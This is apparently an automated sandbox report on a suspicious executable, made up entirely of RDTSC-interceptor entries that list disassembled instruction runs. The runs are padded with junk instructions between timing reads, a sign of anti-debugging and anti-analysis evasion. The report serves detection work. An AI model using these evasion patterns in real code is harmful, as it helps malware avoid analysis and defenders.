Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77807D5 second address: 77807FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4970D67E99h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77807FD second address: 7780803 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780803 second address: 77808B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 2DE9h 0x00000007 pushfd 0x00000008 jmp 00007F4970D67E96h 0x0000000d and ch, FFFFFFB8h 0x00000010 jmp 00007F4970D67E8Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+68h] 0x0000001c pushad 0x0000001d movzx esi, dx 0x00000020 pushfd 0x00000021 jmp 00007F4970D67E91h 0x00000026 adc ecx, 6506A156h 0x0000002c jmp 00007F4970D67E91h 0x00000031 popfd 0x00000032 popad 0x00000033 mov dword ptr [esi+2Ch], eax 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F4970D67E8Ch 0x0000003d xor cl, 00000078h 0x00000040 jmp 00007F4970D67E8Bh 0x00000045 popfd 0x00000046 mov cx, FAAFh 0x0000004a popad 0x0000004b mov ax, word ptr [ebx+6Ch] 0x0000004f jmp 00007F4970D67E92h 0x00000054 mov word ptr [esi+30h], ax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F4970D67E8Ah 0x00000061 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77808B2 second address: 77808B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77808B8 second address: 77808F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 pushad 0x00000011 call 00007F4970D67E8Eh 0x00000016 jmp 00007F4970D67E92h 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e mov bx, E044h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77808F9 second address: 7780962 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4970E062CDh 0x00000008 adc cl, FFFFFF86h 0x0000000b jmp 00007F4970E062D1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov word ptr [esi+32h], ax 0x00000018 jmp 00007F4970E062CEh 0x0000001d mov eax, dword ptr [ebx+0000008Ch] 0x00000023 jmp 00007F4970E062D0h 0x00000028 mov dword ptr [esi+34h], eax 0x0000002b pushad 0x0000002c jmp 00007F4970E062CEh 0x00000031 push eax 0x00000032 push edx 0x00000033 mov ecx, 493C4607h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780962 second address: 778098F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+18h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4970D67E97h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778098F second address: 7780995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780995 second address: 7780999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780999 second address: 77809DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+38h], eax 0x0000000e jmp 00007F4970E062D6h 0x00000013 mov eax, dword ptr [ebx+1Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4970E062D7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77809DF second address: 7780A29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c jmp 00007F4970D67E8Eh 0x00000011 mov eax, dword ptr [ebx+20h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4970D67E97h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780A29 second address: 7780AB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c jmp 00007F4970E062CEh 0x00000011 lea eax, dword ptr [ebx+00000080h] 0x00000017 pushad 0x00000018 call 00007F4970E062CEh 0x0000001d mov ebx, ecx 0x0000001f pop ecx 0x00000020 call 00007F4970E062D7h 0x00000025 movzx ecx, di 0x00000028 pop edx 0x00000029 popad 0x0000002a push 00000001h 0x0000002c jmp 00007F4970E062D0h 0x00000031 nop 0x00000032 jmp 00007F4970E062D0h 0x00000037 push eax 0x00000038 pushad 0x00000039 mov si, di 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780AB5 second address: 7780AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F4970D67E91h 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e jmp 00007F4970D67E8Eh 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780AE4 second address: 7780AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780AE8 second address: 7780B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780B05 second address: 7780B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970E062CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780B15 second address: 7780B42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F4970D67E8Ch 0x0000000f mov eax, 74025E11h 0x00000014 popad 0x00000015 nop 0x00000016 pushad 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b mov edi, 58ACC568h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 mov cx, di 0x00000026 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780BE7 second address: 7780C3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F4970E062CFh 0x00000018 and al, FFFFFF8Eh 0x0000001b jmp 00007F4970E062D9h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780C3A second address: 7780CB8 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b pushad 0x0000000c mov bx, si 0x0000000f mov ax, 8FABh 0x00000013 popad 0x00000014 lea eax, dword ptr [ebx+78h] 0x00000017 pushad 0x00000018 mov bh, ch 0x0000001a jmp 00007F4970D67E99h 0x0000001f popad 0x00000020 push 00000001h 0x00000022 pushad 0x00000023 movzx esi, dx 0x00000026 pushfd 0x00000027 jmp 00007F4970D67E99h 0x0000002c sub cx, 3286h 0x00000031 jmp 00007F4970D67E91h 0x00000036 popfd 0x00000037 popad 0x00000038 nop 0x00000039 pushad 0x0000003a jmp 00007F4970D67E8Ch 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780CB8 second address: 7780D3A instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F4970E062D8h 0x0000000e nop 0x0000000f jmp 00007F4970E062D0h 0x00000014 lea eax, dword ptr [ebp-08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4970E062CDh 0x00000020 xor eax, 1E686EA6h 0x00000026 jmp 00007F4970E062D1h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F4970E062D0h 0x00000032 adc ecx, 30289448h 0x00000038 jmp 00007F4970E062CBh 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780D3A second address: 7780D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780D40 second address: 7780D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780D44 second address: 7780DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a call 00007F4970D67E8Ah 0x0000000f pushfd 0x00000010 jmp 00007F4970D67E92h 0x00000015 xor eax, 0E4E39D8h 0x0000001b jmp 00007F4970D67E8Bh 0x00000020 popfd 0x00000021 pop ecx 0x00000022 mov cl, bh 0x00000024 popad 0x00000025 mov dword ptr [esp], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F4970D67E8Dh 0x00000031 or ecx, 2F6F0176h 0x00000037 jmp 00007F4970D67E91h 0x0000003c popfd 0x0000003d jmp 00007F4970D67E90h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780DBE second address: 7780DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780DE3 second address: 7780DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780DE7 second address: 7780DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780DFA second address: 7780E49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4970D67E8Fh 0x00000009 adc esi, 258EFCBEh 0x0000000f jmp 00007F4970D67E99h 0x00000014 popfd 0x00000015 call 00007F4970D67E90h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov edi, eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780E49 second address: 7780E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780E4D second address: 7780E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780E67 second address: 7780E7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, 8DC7h 0x00000012 mov cx, 3F63h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780E7E second address: 7780EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F49E07A66A4h 0x0000000f pushad 0x00000010 mov eax, 4F882B43h 0x00000015 mov ch, 38h 0x00000017 popad 0x00000018 mov eax, dword ptr [ebp-04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4970D67E8Eh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780EBD second address: 7780F13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007F4970E062D6h 0x00000011 lea eax, dword ptr [ebx+70h] 0x00000014 jmp 00007F4970E062D0h 0x00000019 push 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4970E062D7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780F13 second address: 7780F33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F4970D67E8Ch 0x00000010 mov dword ptr [esp], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780F33 second address: 7780F39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780F39 second address: 7780F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780F3E second address: 7780F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4970E062D9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780F65 second address: 7780F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780F6B second address: 7780F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780F6F second address: 7780F73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780F73 second address: 7780F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4970E062CBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780FE1 second address: 778100A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4970D67E95h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778100A second address: 7781030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4970E062CDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781030 second address: 7781036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781036 second address: 778103A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778103A second address: 778104E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F49E07A64F3h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778104E second address: 7781052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781052 second address: 7781058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781058 second address: 7781116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F4970E062CFh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebp-14h] 0x00000011 pushad 0x00000012 jmp 00007F4970E062D5h 0x00000017 mov ecx, 240A8317h 0x0000001c popad 0x0000001d mov ecx, esi 0x0000001f pushad 0x00000020 push esi 0x00000021 pushfd 0x00000022 jmp 00007F4970E062CFh 0x00000027 jmp 00007F4970E062D3h 0x0000002c popfd 0x0000002d pop ecx 0x0000002e pushfd 0x0000002f jmp 00007F4970E062D9h 0x00000034 jmp 00007F4970E062CBh 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esi+0Ch], eax 0x0000003e jmp 00007F4970E062D6h 0x00000043 mov edx, 772406ECh 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F4970E062D7h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781116 second address: 778111C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778111C second address: 7781120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781120 second address: 7781147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4970D67E92h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781147 second address: 778117D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d pushad 0x0000000e mov eax, 4B9F0567h 0x00000013 popad 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4970E062D9h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778117D second address: 778121C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F4970D67E8Eh 0x00000010 jne 00007F49E07A63C0h 0x00000016 pushad 0x00000017 jmp 00007F4970D67E8Eh 0x0000001c push esi 0x0000001d mov si, bx 0x00000020 pop edi 0x00000021 popad 0x00000022 mov edx, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 mov si, F7A5h 0x0000002a mov bl, cl 0x0000002c popad 0x0000002d mov eax, dword ptr [esi] 0x0000002f jmp 00007F4970D67E8Dh 0x00000034 mov dword ptr [edx], eax 0x00000036 jmp 00007F4970D67E8Eh 0x0000003b mov eax, dword ptr [esi+04h] 0x0000003e pushad 0x0000003f movzx esi, dx 0x00000042 jmp 00007F4970D67E93h 0x00000047 popad 0x00000048 mov dword ptr [edx+04h], eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F4970D67E95h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778121C second address: 7781225 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, EC42h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781225 second address: 7781254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4970D67E90h 0x00000013 adc ch, FFFFFFD8h 0x00000016 jmp 00007F4970D67E8Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781254 second address: 7781259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781259 second address: 778125F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778125F second address: 7781263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781263 second address: 77812BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+08h], eax 0x0000000e jmp 00007F4970D67E8Eh 0x00000013 mov eax, dword ptr [esi+0Ch] 0x00000016 pushad 0x00000017 push eax 0x00000018 call 00007F4970D67E8Dh 0x0000001d pop esi 0x0000001e pop edi 0x0000001f movzx ecx, bx 0x00000022 popad 0x00000023 mov dword ptr [edx+0Ch], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4970D67E94h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77812BC second address: 77812C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77812C3 second address: 77812F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+10h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4970D67E92h 0x00000013 adc si, CF58h 0x00000018 jmp 00007F4970D67E8Bh 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77812F7 second address: 7781356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c jmp 00007F4970E062CEh 0x00000011 mov eax, dword ptr [esi+14h] 0x00000014 jmp 00007F4970E062D0h 0x00000019 mov dword ptr [edx+14h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ecx, ebx 0x00000021 jmp 00007F4970E062D9h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781356 second address: 77813BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c jmp 00007F4970D67E8Eh 0x00000011 mov dword ptr [edx+18h], eax 0x00000014 jmp 00007F4970D67E90h 0x00000019 mov eax, dword ptr [esi+1Ch] 0x0000001c jmp 00007F4970D67E90h 0x00000021 mov dword ptr [edx+1Ch], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F4970D67E97h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77813BE second address: 778140F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4970E062CFh 0x00000009 add ah, FFFFFFAEh 0x0000000c jmp 00007F4970E062D9h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [esi+20h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4970E062D9h 0x0000001f rdtsc
